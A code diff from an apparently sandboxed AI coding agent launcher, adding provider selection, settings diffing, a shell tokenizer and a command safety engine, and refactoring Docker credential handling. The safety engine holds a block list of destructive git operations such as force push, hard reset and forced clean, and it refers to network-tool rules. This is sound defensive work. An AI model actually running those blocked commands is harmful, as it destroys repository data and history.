compute_sandbox_import_candidates( + workspace_settings: dict[str, Any] | None, + sandbox_settings: dict[str, Any] | None, +) -> tuple[list[str], dict[str, Any]]: + """Return plugins/marketplaces present in sandbox settings but missing in workspace.""" + if not sandbox_settings: + return [], {} + + workspace_settings = workspace_settings or {} + + workspace_plugins = _normalize_plugins(workspace_settings.get("enabledPlugins")) + sandbox_plugins = _normalize_plugins(sandbox_settings.get("enabledPlugins")) + missing_plugins = sorted([p for p in sandbox_plugins if p not in workspace_plugins]) + + workspace_marketplaces = _normalize_marketplaces( + workspace_settings.get("extraKnownMarketplaces") + ) + sandbox_marketplaces = _normalize_marketplaces(sandbox_settings.get("extraKnownMarketplaces")) + missing_marketplaces = { + name: config + for name, config in sandbox_marketplaces.items() + if name not in workspace_marketplaces + } + + return missing_plugins, missing_marketplaces + + +def merge_sandbox_imports( + workspace_settings: dict[str, Any], + missing_plugins: list[str], + missing_marketplaces: dict[str, Any], +) -> dict[str, Any]: + if not missing_plugins and not missing_marketplaces: + return workspace_settings + + merged = dict(workspace_settings) + + plugins_value = merged.get("enabledPlugins") + if isinstance(plugins_value, list): + plugins_map = {str(p): True for p in plugins_value} + elif isinstance(plugins_value, dict): + plugins_map = dict(plugins_value) + else: + plugins_map = {} + + for plugin in missing_plugins: + plugins_map[plugin] = True + if plugins_map: + merged["enabledPlugins"] = plugins_map + + marketplaces_value = merged.get("extraKnownMarketplaces") + if isinstance(marketplaces_value, dict): + marketplaces_map = dict(marketplaces_value) + else: + marketplaces_map = {} + marketplaces_map.update(missing_marketplaces) + if marketplaces_map: + merged["extraKnownMarketplaces"] = marketplaces_map + + return merged + + +def build_diff_text(label: str, before: dict[str, Any], after: dict[str, Any]) -> str: + import difflib + + before_text = json.dumps(before, indent=2, sort_keys=True).splitlines() + after_text = json.dumps(after, indent=2, sort_keys=True).splitlines() + diff_lines = difflib.unified_diff( + before_text, + after_text, + fromfile=f"{label} (current)", + tofile=f"{label} (personal)", + lineterm="", + ) + return "\n".join(diff_lines) + + +def compute_structured_diff( + workspace_settings: dict[str, Any] | None, + profile_settings: dict[str, Any] | None, + workspace_mcp: dict[str, Any] | None, + profile_mcp: dict[str, Any] | None, +) -> StructuredDiff: + """Compute structured diff between workspace and profile for TUI display. + + Args: + workspace_settings: Current workspace settings (settings.local.json) + profile_settings: Saved profile settings + workspace_mcp: Current workspace MCP config (.mcp.json) + profile_mcp: Saved profile MCP config + + Returns: + StructuredDiff with items showing additions, removals, modifications + """ + items: list[DiffItem] = [] + + workspace_settings = workspace_settings or {} + profile_settings = profile_settings or {} + workspace_mcp = workspace_mcp or {} + profile_mcp = profile_mcp or {} + + # Compare plugins + ws_plugins = _normalize_plugins(workspace_settings.get("enabledPlugins")) + prof_plugins = _normalize_plugins(profile_settings.get("enabledPlugins")) + + # Plugins in profile but not workspace (would be added on apply) + for plugin in sorted(prof_plugins.keys()): + if plugin not in ws_plugins: + items.append( + DiffItem(name=plugin, status=DiffItemStatus.ADDED, section=DiffItemSection.PLUGINS) + ) + + # Plugins in workspace but not profile (would be removed on apply) + for plugin in sorted(ws_plugins.keys()): + if plugin not in prof_plugins: + items.append( + DiffItem( + name=plugin, status=DiffItemStatus.REMOVED, section=DiffItemSection.PLUGINS + ) + ) + + # Compare marketplaces + ws_markets = _normalize_marketplaces(workspace_settings.get("extraKnownMarketplaces")) + prof_markets = _normalize_marketplaces(profile_settings.get("extraKnownMarketplaces")) + + for name in sorted(prof_markets.keys()): + if name not in ws_markets: + items.append( + DiffItem( + name=name, status=DiffItemStatus.ADDED, section=DiffItemSection.MARKETPLACES + ) + ) + elif prof_markets[name] != ws_markets[name]: + items.append( + DiffItem( + name=name, status=DiffItemStatus.MODIFIED, section=DiffItemSection.MARKETPLACES + ) + ) + + for name in sorted(ws_markets.keys()): + if name not in prof_markets: + items.append( + DiffItem( + name=name, status=DiffItemStatus.REMOVED, section=DiffItemSection.MARKETPLACES + ) + ) + + # Compare MCP servers + ws_servers = workspace_mcp.get("mcpServers", {}) + prof_servers = profile_mcp.get("mcpServers", {}) + + for name in sorted(prof_servers.keys()): + if name not in ws_servers: + items.append( + DiffItem( + name=name, status=DiffItemStatus.ADDED, section=DiffItemSection.MCP_SERVERS + ) + ) + elif prof_servers[name] != ws_servers[name]: + items.append( + DiffItem( + name=name, status=DiffItemStatus.MODIFIED, section=DiffItemSection.MCP_SERVERS + ) + ) + + for name in sorted(ws_servers.keys()): + if name not in prof_servers: + items.append( + DiffItem( + name=name, status=DiffItemStatus.REMOVED, section=DiffItemSection.MCP_SERVERS + ) + ) + + return StructuredDiff(items=items, total_count=len(items)) diff --git a/src/scc_cli/core/provider_registry.py b/src/scc_cli/core/provider_registry.py new file mode 100644 index 0000000..3478917 --- /dev/null +++ b/src/scc_cli/core/provider_registry.py @@ -0,0 +1,57 @@ +"""Canonical provider runtime registry. + +Single source of truth for provider-specific runtime constants +(image ref, config directory, settings path, data volume). Replaces +the scattered ``_PROVIDER_*`` dicts that lived in start_session and +dependencies modules. + +This module sits at the composition layer — it imports from ``core`` +only. Do NOT import from ``adapters``, ``commands``, or ``application``. +""" + +from __future__ import annotations + +from scc_cli.core.contracts import ProviderRuntimeSpec +from scc_cli.core.errors import InvalidProviderError +from scc_cli.core.image_contracts import SCC_CLAUDE_IMAGE_REF, SCC_CODEX_IMAGE_REF + +PROVIDER_REGISTRY: dict[str, ProviderRuntimeSpec] = { + "claude": ProviderRuntimeSpec( + provider_id="claude", + display_name="Claude Code", + image_ref=SCC_CLAUDE_IMAGE_REF, + config_dir=".claude", + settings_path=".claude/settings.json", + data_volume="docker-claude-sandbox-data", + ), + "codex": ProviderRuntimeSpec( + provider_id="codex", + display_name="Codex", + image_ref=SCC_CODEX_IMAGE_REF, + config_dir=".codex", + settings_path=".codex/config.toml", + settings_scope="workspace", + data_volume="docker-codex-sandbox-data", + ), +} + + +def get_runtime_spec(provider_id: str) -> ProviderRuntimeSpec: + """Look up runtime constants for a provider. Fail-closed on unknown IDs. + + Args: + provider_id: The provider identifier (e.g. ``"claude"``, ``"codex"``). + + Returns: + The frozen runtime spec for the provider. + + Raises: + InvalidProviderError: If *provider_id* is not in the registry. + """ + try: + return PROVIDER_REGISTRY[provider_id] + except KeyError: + raise InvalidProviderError( + provider_id=provider_id, + known_providers=tuple(PROVIDER_REGISTRY.keys()), + ) diff --git a/src/scc_cli/core/provider_resolution.py b/src/scc_cli/core/provider_resolution.py new file mode 100644 index 0000000..c1c8232 --- /dev/null +++ b/src/scc_cli/core/provider_resolution.py @@ -0,0 +1,76 @@ +"""Pure-logic provider resolution. + +Resolves which agent provider to use based on precedence: + CLI flag > user config > default ('claude') + +Policy validation checks the resolved provider against +the team's allowed_providers list. +""" + +from __future__ import annotations + +KNOWN_PROVIDERS: tuple[str, ...] = ("claude", "codex") + +_DEFAULT_PROVIDER: str = "claude" + +_PROVIDER_DISPLAY_NAMES: dict[str, str] = { + "claude": "Claude Code", + "codex": "Codex", +} + + +def get_provider_display_name(provider_id: str) -> str: + """Return a human-readable display name for a provider. + + Known providers map to their canonical display names. + Unknown providers get title-cased. + + Args: + provider_id: The provider identifier (e.g. "claude", "codex"). + + Returns: + Human-readable display name. + """ + return _PROVIDER_DISPLAY_NAMES.get(provider_id, provider_id.title()) + + +def resolve_active_provider( + cli_flag: str | None, + config_provider: str | None, + allowed_providers: tuple[str, ...] = (), +) -> str: + """Resolve the active provider from multiple sources. + + Precedence: cli_flag > config_provider > default ('claude'). + + Args: + cli_flag: Provider specified via --provider on the CLI. + config_provider: Provider persisted in user config. + allowed_providers: Tuple of allowed provider IDs from team policy. + Empty tuple means all known providers are allowed. + + Returns: + The resolved provider ID string. + + Raises: + ValueError: If the resolved provider is not in KNOWN_PROVIDERS. + ProviderNotAllowedError: If the resolved provider is blocked + by the team's allowed_providers policy. + """ + from scc_cli.core.errors import ProviderNotAllowedError + + effective_config_provider = None if config_provider == "ask" else config_provider + provider = cli_flag or effective_config_provider or _DEFAULT_PROVIDER + + if provider not in KNOWN_PROVIDERS: + raise ValueError( + f"Unknown provider '{provider}'. Known providers: {', '.join(KNOWN_PROVIDERS)}" + ) + + if allowed_providers and provider not in allowed_providers: + raise ProviderNotAllowedError( + provider_id=provider, + allowed_providers=allowed_providers, + ) + + return provider diff --git a/src/scc_cli/core/safety_engine.py b/src/scc_cli/core/safety_engine.py new file mode 100644 index 0000000..043ff7c --- /dev/null +++ b/src/scc_cli/core/safety_engine.py @@ -0,0 +1,121 @@ +"""Default safety engine orchestrating shell tokenization, git rules, and network tool rules. + +Implements the SafetyEngine protocol from ports/safety_engine.py. +All evaluation is provider-neutral: both Claude and Codex adapters +consume this engine downstream. +""" + +from __future__ import annotations + +from pathlib import PurePosixPath + +from scc_cli.core.contracts import SafetyPolicy, SafetyVerdict +from scc_cli.core.git_safety_rules import analyze_git +from scc_cli.core.network_tool_rules import analyze_network_tool +from scc_cli.core.shell_tokenizer import extract_all_commands + +# Maps matched_rule identifiers to SafetyPolicy.rules keys. +# fail-closed: if the key is missing from policy.rules, the rule is enabled. +_MATCHED_RULE_TO_POLICY_KEY: dict[str, str] = { + "git.force_push": "block_force_push", + "git.push_mirror": "block_push_mirror", + "git.reset_hard": "block_reset_hard", + "git.branch_force_delete": "block_branch_force_delete", + "git.stash_drop": "block_stash_drop", + "git.stash_clear": "block_stash_clear", + "git.clean_force": "block_clean_force", + "git.checkout_path": "block_checkout_path", + "git.restore_worktree": "block_restore_worktree", + "git.reflog_expire": "block_reflog_expire", + "git.gc_prune": "block_gc_prune", + "git.filter_branch": "block_filter_branch", +} + + +def _matched_rule_to_policy_key(matched_rule: str) -> str | None: + """Map a matched_rule identifier to its policy key. + + Args: + matched_rule: Rule identifier like 'git.force_push' or 'network.curl'. + + Returns: + Policy key like 'block_force_push', or None if no mapping exists. + """ + return _MATCHED_RULE_TO_POLICY_KEY.get(matched_rule) + + +class DefaultSafetyEngine: + """Provider-neutral command safety evaluator. + + Orchestrates shell tokenization, git rules, and network tool rules + into a single evaluate() call that satisfies the SafetyEngine protocol. + """ + + def evaluate(self, command: str, policy: SafetyPolicy) -> SafetyVerdict: + """Evaluate a command string against the given safety policy. + + Args: + command: Shell command string to evaluate. + policy: Safety policy containing rules and baseline action. + + Returns: + A typed verdict indicating whether the command is allowed. + """ + # Empty/whitespace commands are always safe + if not command or not command.strip(): + return SafetyVerdict(allowed=True, reason="Empty command") + + # Policy action "allow" bypasses all rules + if policy.action == "allow": + return SafetyVerdict(allowed=True, reason="Policy action is allow") + + # Tokenize and check all sub-commands (handles pipes, &&, bash -c nesting) + for tokens in extract_all_commands(command): + if not tokens: + continue + + # Check git rules: is the first token (path-stripped) 'git'? + first_bare = PurePosixPath(tokens[0]).name + if first_bare == "git": + verdict = analyze_git(tokens) + if verdict is not None and not verdict.allowed: + return self._apply_policy(verdict, policy) + + # Check network tool rules + net_verdict = analyze_network_tool(tokens) + if net_verdict is not None and not net_verdict.allowed: + return self._apply_policy(net_verdict, policy) + + return SafetyVerdict(allowed=True, reason="No safety rules matched") + + def _apply_policy(self, verdict: SafetyVerdict, policy: SafetyPolicy) -> SafetyVerdict: + """Apply policy overrides to a block verdict. + + Checks if the rule is disabled in policy.rules. If the policy + action is 'warn', converts block to allowed with WARNING prefix. + Missing keys default to True (fail-closed: rule enabled). + """ + # Check if this specific rule is disabled in the policy + if verdict.matched_rule is not None: + policy_key = _matched_rule_to_policy_key(verdict.matched_rule) + if policy_key is not None: + rule_enabled = policy.rules.get(policy_key, True) + if not rule_enabled: + return SafetyVerdict( + allowed=True, + reason=f"Rule {verdict.matched_rule} disabled by policy", + matched_rule=verdict.matched_rule, + command_family=verdict.command_family, + ) + + # Warn mode: allow but prefix reason + if policy.action == "warn": + return SafetyVerdict( + allowed=True, + reason=f"WARNING: {verdict.reason}", + matched_rule=verdict.matched_rule, + command_family=verdict.command_family, + ) + + # Default: return the block verdict as-is + return verdict diff --git a/src/scc_cli/core/safety_policy_loader.py b/src/scc_cli/core/safety_policy_loader.py new file mode 100644 index 0000000..f0b1700 --- /dev/null +++ b/src/scc_cli/core/safety_policy_loader.py @@ -0,0 +1,70 @@ +"""Typed safety-policy loader for host-side org config. + +Extracts and validates a ``SafetyPolicy`` from a raw org config dict. +Fail-closed: any parse failure, missing section, or invalid value produces +a default ``SafetyPolicy(action="block")``. + +This module intentionally duplicates the ~10 lines of validation logic from +``docker.launch`` so that core has no import dependency on the docker layer. +""" + +from __future__ import annotations + +from typing import Any + +from .contracts import SafetyPolicy + +# Valid baseline action values — same set used by docker.launch. +VALID_SAFETY_NET_ACTIONS: frozenset[str] = frozenset({"block", "warn", "allow"}) + +_DEFAULT_POLICY = SafetyPolicy(action="block") + + +def load_safety_policy(org_config: dict[str, Any] | None) -> SafetyPolicy: + """Return a typed ``SafetyPolicy`` extracted from a raw org config dict. + + Parameters + ---------- + org_config: + Raw organisation configuration dict as loaded from the JSON cache, + or ``None`` when no org config is available. + + Returns + ------- + SafetyPolicy + Always returns a valid ``SafetyPolicy`` — never ``None``. + On any parse error, missing key, or invalid value the function + returns the default fail-closed policy (``action="block"``). + """ + if org_config is None: + return _DEFAULT_POLICY + + try: + if not isinstance(org_config, dict): + return _DEFAULT_POLICY + + security = org_config.get("security") + if not isinstance(security, dict): + return _DEFAULT_POLICY + + safety_net = security.get("safety_net") + if not isinstance(safety_net, dict): + return _DEFAULT_POLICY + + raw_action = safety_net.get("action") + action: str = ( + raw_action + if isinstance(raw_action, str) and raw_action in VALID_SAFETY_NET_ACTIONS + else "block" + ) + + # Everything except "action" is treated as a rule setting. + rules: dict[str, Any] = {k: v for k, v in safety_net.items() if k != "action"} + + return SafetyPolicy( + action=action, + rules=rules, + source="org.security.safety_net", + ) + except Exception: + return _DEFAULT_POLICY diff --git a/src/scc_cli/core/shell_tokenizer.py b/src/scc_cli/core/shell_tokenizer.py new file mode 100644 index 0000000..5bf6172 --- /dev/null +++ b/src/scc_cli/core/shell_tokenizer.py @@ -0,0 +1,213 @@ +"""Shell command tokenization with bash -c recursion support. + +This module provides POSIX-compliant shell tokenization for analyzing +commands before execution. It handles: +- Command splitting on shell operators (;, &&, ||, |) +- POSIX tokenization via shlex.split() +- Wrapper stripping (sudo, env, command) +- Nested bash -c / sh -c command extraction (depth-limited) +""" + +from __future__ import annotations + +import re +import shlex +from collections.abc import Iterator + +# Max recursion depth for nested bash -c commands +MAX_RECURSION_DEPTH = 3 + +# Wrappers to strip before analysis +WRAPPER_COMMANDS = frozenset({"sudo", "env", "command", "nice", "nohup", "time"}) + +# Shell interpreters that take -c for command strings +SHELL_INTERPRETERS = frozenset({"bash", "sh", "zsh", "dash", "ksh"}) + +# Regex for splitting on shell operators (preserves the operators) +SHELL_OPERATOR_PATTERN = re.compile(r"\s*(;|&&|\|\||\|)\s*") + + +def split_commands(command: str) -> list[str]: + """Split a command string on shell operators. + + Args: + command: Full command string that may contain multiple commands + + Returns: + List of individual command segments (operators discarded) + + Example: + >>> split_commands("echo foo && git push --force; ls") + ['echo foo', 'git push --force', 'ls'] + """ + if not command or not command.strip(): + return [] + + # Split on operators but keep non-empty segments + segments = SHELL_OPERATOR_PATTERN.split(command) + + # Filter out operators and empty strings + return [ + seg.strip() for seg in segments if seg.strip() and seg.strip() not in (";", "&&", "||", "|") + ] + + +def tokenize(segment: str) -> list[str]: + """Tokenize a command segment using POSIX shell rules. + + Args: + segment: Single command segment (no shell operators) + + Returns: + List of tokens, or empty list on parse error + + Example: + >>> tokenize("git push --force origin main") + ['git', 'push', '--force', 'origin', 'main'] + """ + if not segment or not segment.strip(): + return [] + + try: + return shlex.split(segment) + except ValueError: + # Malformed quotes or other parse errors + return [] + + +def strip_wrappers(tokens: list[str]) -> list[str]: + """Remove command wrappers that don't affect the underlying command. + + Strips: sudo, env, command, nice, nohup, time + + Args: + tokens: List of command tokens + + Returns: + Tokens with wrappers removed from the front + + Example: + >>> strip_wrappers(['sudo', '-u', 'root', 'git', 'push']) + ['git', 'push'] + >>> strip_wrappers(['env', 'VAR=val', 'git', 'push']) + ['git', 'push'] + """ + if not tokens: + return [] + + result = list(tokens) + + while result: + cmd = result[0].split("/")[-1] # Handle /usr/bin/sudo + + if cmd not in WRAPPER_COMMANDS: + break + + # Remove the wrapper command + result.pop(0) + + # Skip wrapper-specific arguments + if cmd == "sudo": + # sudo can have flags like -u user, -E, etc. + while result and result[0].startswith("-"): + flag = result.pop(0) + # Flags that take an argument + if flag in ("-u", "-g", "-C", "-D", "-h", "-p", "-r", "-t", "-U"): + if result: + result.pop(0) + elif cmd == "env": + # env: skip VAR=val assignments and -i/-u flags + while result: + if "=" in result[0]: + result.pop(0) + elif result[0].startswith("-"): + flag = result.pop(0) + if flag in ("-u",) and result: + result.pop(0) + else: + break + elif cmd == "nice": + # nice: skip -n adjustment + if result and result[0] == "-n" and len(result) > 1: + result.pop(0) + result.pop(0) + elif result and result[0].startswith("-"): + result.pop(0) + # command, nohup, time: just remove the wrapper itself + + return result + + +def extract_bash_c(tokens: list[str]) -> str | None: + """Extract the command string from bash -c 'command' patterns. + + Args: + tokens: List of command tokens + + Returns: + The command string passed to -c, or None if not a bash -c pattern + + Example: + >>> extract_bash_c(['bash', '-c', 'git push --force']) + 'git push --force' + >>> extract_bash_c(['sh', '-c', 'echo hello']) + 'echo hello' + """ + if len(tokens) < 3: + return None + + # Check if first token is a shell interpreter + cmd = tokens[0].split("/")[-1] + if cmd not in SHELL_INTERPRETERS: + return None + + # Look for -c flag + try: + c_index = tokens.index("-c") + if c_index + 1 < len(tokens): + return tokens[c_index + 1] + except ValueError: + pass + + return None + + +def extract_all_commands( + command: str, + _depth: int = 0, +) -> Iterator[list[str]]: + """Extract all command token lists from a command string. + + Handles shell operators and bash -c nesting recursively. + + Args: + command: Command string to analyze + _depth: Internal recursion depth counter (do not set) + + Yields: + Token lists for each command found + + Example: + >>> list(extract_all_commands("bash -c 'git push -f'")) + [['bash', '-c', 'git push -f'], ['git', 'push', '-f']] + """ + if _depth > MAX_RECURSION_DEPTH: + return + + for segment in split_commands(command): + tokens = tokenize(segment) + if not tokens: + continue + + # Strip wrappers first + stripped = strip_wrappers(tokens) + if not stripped: + continue + + # Yield the stripped tokens + yield stripped + + # Check for bash -c patterns and recurse + nested_cmd = extract_bash_c(stripped) + if nested_cmd: + yield from extract_all_commands(nested_cmd, _depth + 1) diff --git a/src/scc_cli/docker/__init__.py b/src/scc_cli/docker/__init__.py index da7b4cd..3e4725f 100644 --- a/src/scc_cli/docker/__init__.py +++ b/src/scc_cli/docker/__init__.py @@ -56,6 +56,7 @@ get_docker_desktop_version, get_docker_version, list_running_sandboxes, + list_running_scc_containers, list_scc_containers, remove_container, resume_container, @@ -108,6 +109,7 @@ "validate_container_filename", # Container queries "list_scc_containers", + "list_running_scc_containers", "list_running_sandboxes", # Credential management "prepare_sandbox_volume_for_credentials", diff --git a/src/scc_cli/docker/core.py b/src/scc_cli/docker/core.py index 29998a6..29775e2 100644 --- a/src/scc_cli/docker/core.py +++ b/src/scc_cli/docker/core.py @@ -3,6 +3,11 @@ Contain stateless Docker primitives that don't manage persistent state. For credential persistence, see credentials.py. + +**Legacy Docker Desktop sandbox path.** This module supports the Docker Desktop +``docker sandbox run`` command (available in Docker Desktop >= 4.50). It is NOT +used by the OCI-based launch path (see ``adapters/oci_sandbox_runtime.py``). +Retained for users whose Docker Desktop includes the sandbox feature. """ import datetime @@ -14,7 +19,6 @@ from dataclasses import dataclass from pathlib import Path -from ..core.constants import SANDBOX_IMAGE from ..core.errors import ( ContainerNotFoundError, DockerDaemonNotRunningError, @@ -27,6 +31,10 @@ # Minimum Docker Desktop version required for sandbox feature MIN_DOCKER_VERSION = "4.50.0" +# Claude-specific Docker Desktop sandbox constants (local to this adapter) +_SANDBOX_IMAGE = "docker/sandbox-templates:claude-code" +_SANDBOX_DATA_MOUNT = "/mnt/claude-data" + # Label prefix for SCC containers LABEL_PREFIX = "scc" @@ -248,8 +256,6 @@ def build_command( - Agent `claude` is ALWAYS included, even in detached mode - Session flags passed via docker exec in detached mode (see run_sandbox) """ - from ..core.constants import SANDBOX_DATA_MOUNT - cmd = ["docker", "sandbox", "run"] # Detached mode: create container without running Claude interactively @@ -269,7 +275,7 @@ def build_command( # Mount the parent directory containing the policy file policy_dir = policy_host_path.parent policy_filename = policy_host_path.name - container_policy_dir = f"{SANDBOX_DATA_MOUNT}/policy" + container_policy_dir = f"{_SANDBOX_DATA_MOUNT}/policy" container_policy_path = f"{container_policy_dir}/{policy_filename}" # -v host_dir:container_dir:ro ← Kernel-enforced read-only # Even sudo inside container cannot bypass `:ro` - requires CAP_SYS_ADMIN @@ -433,7 +439,7 @@ def _list_all_sandbox_containers() -> list[ContainerInfo]: "ps", "-a", "--filter", - f"ancestor={SANDBOX_IMAGE}", + f"ancestor={_SANDBOX_IMAGE}", "--format", "{{.ID}}\t{{.Names}}\t{{.Status}}", ], @@ -464,10 +470,7 @@ def _list_all_sandbox_containers() -> list[ContainerInfo]: def list_scc_containers() -> list[ContainerInfo]: - """Return all SCC-managed containers (running and stopped). - - Includes Docker Desktop Claude sandboxes which do not support SCC labels. - """ + """Return all SCC-managed containers (running and stopped).""" try: result = subprocess.run( [ @@ -503,17 +506,18 @@ def list_scc_containers() -> list[ContainerInfo]: ) ) - # Merge in Docker sandbox containers (dedupe by ID) - sandbox_containers = _list_all_sandbox_containers() - if sandbox_containers: - existing_ids = {c.id for c in containers} - for container in sandbox_containers: - if container.id not in existing_ids: - containers.append(container) - return containers except (subprocess.TimeoutExpired, FileNotFoundError, OSError): - return _list_all_sandbox_containers() + return [] + + +def list_running_scc_containers() -> list[ContainerInfo]: + """Return only running SCC-managed containers.""" + return [ + container + for container in list_scc_containers() + if container.status.lower().startswith("up") + ] def list_running_sandboxes() -> list[ContainerInfo]: @@ -530,7 +534,7 @@ def list_running_sandboxes() -> list[ContainerInfo]: "docker", "ps", "--filter", - f"ancestor={SANDBOX_IMAGE}", + f"ancestor={_SANDBOX_IMAGE}", "--format", "{{.ID}}\t{{.Names}}\t{{.Status}}", ], diff --git a/src/scc_cli/docker/credentials.py b/src/scc_cli/docker/credentials.py index 8d1e356..9ec1154 100644 --- a/src/scc_cli/docker/credentials.py +++ b/src/scc_cli/docker/credentials.py @@ -29,9 +29,12 @@ import tempfile from pathlib import Path -from ..core.constants import OAUTH_CREDENTIAL_KEY, SANDBOX_DATA_VOLUME from .core import _list_all_sandbox_containers, list_running_sandboxes +# Claude-specific credential constants (local to this Docker Desktop adapter) +_OAUTH_CREDENTIAL_KEY = "claudeAiOauth" +_SANDBOX_DATA_VOLUME = "docker-claude-sandbox-data" + def _preinit_credential_volume() -> None: """ @@ -67,7 +70,7 @@ def _preinit_credential_volume() -> None: "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", @@ -99,7 +102,7 @@ def _check_volume_has_credentials() -> bool: "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "cat", "/data/.credentials.json", @@ -115,7 +118,7 @@ def _check_volume_has_credentials() -> bool: # Validate JSON and check for OAuth tokens try: creds = json.loads(result.stdout) - return bool(creds and creds.get(OAUTH_CREDENTIAL_KEY)) + return bool(creds and creds.get(_OAUTH_CREDENTIAL_KEY)) except json.JSONDecodeError: return False @@ -159,7 +162,7 @@ def _copy_credentials_from_container(container_id: str, is_running: bool) -> boo # Validate JSON try: creds = json.loads(result.stdout) - if not creds or not creds.get(OAUTH_CREDENTIAL_KEY): + if not creds or not creds.get(_OAUTH_CREDENTIAL_KEY): return False except json.JSONDecodeError: return False @@ -172,7 +175,7 @@ def _copy_credentials_from_container(container_id: str, is_running: bool) -> boo "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", @@ -198,7 +201,7 @@ def _copy_credentials_from_container(container_id: str, is_running: bool) -> boo "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", @@ -242,7 +245,7 @@ def _copy_credentials_from_container(container_id: str, is_running: bool) -> boo try: content = creds_path.read_text() creds = json.loads(content) - if not creds or not creds.get(OAUTH_CREDENTIAL_KEY): + if not creds or not creds.get(_OAUTH_CREDENTIAL_KEY): return False except (json.JSONDecodeError, OSError): return False @@ -255,7 +258,7 @@ def _copy_credentials_from_container(container_id: str, is_running: bool) -> boo "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", @@ -289,7 +292,7 @@ def _copy_credentials_from_container(container_id: str, is_running: bool) -> boo "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", @@ -439,7 +442,7 @@ def _migrate_credentials_to_volume(container_id: str) -> bool: content = result.stdout try: creds = json.loads(content) - if creds and creds.get(OAUTH_CREDENTIAL_KEY): + if creds and creds.get(_OAUTH_CREDENTIAL_KEY): # Valid OAuth credentials - copy to volume escaped = content.replace("'", "'\"'\"'") subprocess.run( @@ -448,7 +451,7 @@ def _migrate_credentials_to_volume(container_id: str) -> bool: "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", @@ -486,7 +489,7 @@ def _migrate_credentials_to_volume(container_id: str) -> bool: "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", @@ -698,7 +701,7 @@ def prepare_sandbox_volume_for_credentials() -> bool: "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", diff --git a/src/scc_cli/docker/launch.py b/src/scc_cli/docker/launch.py index 6013dd9..1629f7e 100644 --- a/src/scc_cli/docker/launch.py +++ b/src/scc_cli/docker/launch.py @@ -3,32 +3,43 @@ Orchestrate the Docker sandbox lifecycle, combining primitives from core.py and credential management from credentials.py. + +**Legacy Docker Desktop sandbox path.** This module orchestrates launches via +``docker sandbox run`` (Docker Desktop >= 4.50). It is NOT used by the +OCI-based launch path (see ``adapters/oci_sandbox_runtime.py``). Retained for +users whose Docker Desktop includes the sandbox feature. """ import json import os import subprocess import tempfile -import time -from datetime import datetime, timezone from pathlib import Path from typing import Any, cast from ..config import get_cache_dir -from ..console import err_line -from ..core.constants import SAFETY_NET_POLICY_FILENAME, SANDBOX_DATA_MOUNT, SANDBOX_DATA_VOLUME -from ..core.errors import SandboxLaunchError from .core import ( build_command, validate_container_filename, ) -from .credentials import ( - _create_symlinks_in_container, - _preinit_credential_volume, - _start_migration_loop, - _sync_credentials_from_existing_containers, + +# Re-export sandbox runtime functions for backward compatibility. +# These were extracted to sandbox.py to keep launch.py under 800 lines. +from .sandbox import ( # noqa: F401 + _build_known_marketplaces_cache, + _is_mount_race_error, + inject_plugin_settings_to_container, + run_sandbox, + seed_container_plugin_marketplaces, ) +# ───────────────────────────────────────────────────────────────────────────── +# Claude-specific Docker Desktop constants (local to this adapter) +# ───────────────────────────────────────────────────────────────────────────── +_SAFETY_NET_POLICY_FILENAME = "effective_policy.json" +_SANDBOX_DATA_MOUNT = "/mnt/claude-data" +_SANDBOX_DATA_VOLUME = "docker-claude-sandbox-data" + # ───────────────────────────────────────────────────────────────────────────── # Safety Net Policy Injection # ───────────────────────────────────────────────────────────────────────────── @@ -40,7 +51,7 @@ VALID_SAFETY_NET_ACTIONS: frozenset[str] = frozenset({"block", "warn", "allow"}) # Container path for policy (constant derived from mount point) -CONTAINER_POLICY_PATH = f"{SANDBOX_DATA_MOUNT}/{SAFETY_NET_POLICY_FILENAME}" +CONTAINER_POLICY_PATH = f"{_SANDBOX_DATA_MOUNT}/{_SAFETY_NET_POLICY_FILENAME}" def extract_safety_net_policy(org_config: dict[str, Any] | None) -> dict[str, Any] | None: @@ -117,7 +128,7 @@ def _write_policy_to_dir(policy: dict[str, Any], target_dir: Path) -> Path | Non except OSError: return None - policy_path = target_dir / SAFETY_NET_POLICY_FILENAME + policy_path = target_dir / _SAFETY_NET_POLICY_FILENAME content = json.dumps(policy, indent=2) try: @@ -213,7 +224,7 @@ def _cleanup_fallback_policy_files() -> None: Failures are silently ignored - this is purely optional hygiene. """ fallback_dir = _get_fallback_policy_dir() - fallback_file = fallback_dir / SAFETY_NET_POLICY_FILENAME + fallback_file = fallback_dir / _SAFETY_NET_POLICY_FILENAME try: fallback_file.unlink(missing_ok=True) # Also try to remove the directory if empty @@ -223,25 +234,6 @@ def _cleanup_fallback_policy_files() -> None: pass # Silently ignore - this is optional hygiene -def _is_mount_race_error(stderr: str) -> bool: - """Check if Docker error is a mount race condition (retryable). - - Docker Desktop's VirtioFS can have delays before newly created files - are visible. This function detects these specific errors. - - Args: - stderr: The stderr output from the Docker command. - - Returns: - True if the error indicates a mount race condition. - """ - error_lower = stderr.lower() - return ( - "bind source path does not exist" in error_lower - or "no such file or directory" in error_lower - ) - - def run( cmd: list[str], ensure_credentials: bool = True, @@ -301,224 +293,6 @@ def run( ) -def run_sandbox( - workspace: Path | None = None, - continue_session: bool = False, - resume: bool = False, - ensure_credentials: bool = True, - org_config: dict[str, Any] | None = None, - container_workdir: Path | None = None, - plugin_settings: dict[str, Any] | None = None, - env_vars: dict[str, str] | None = None, -) -> int: - """ - Run Claude in a Docker sandbox with credential 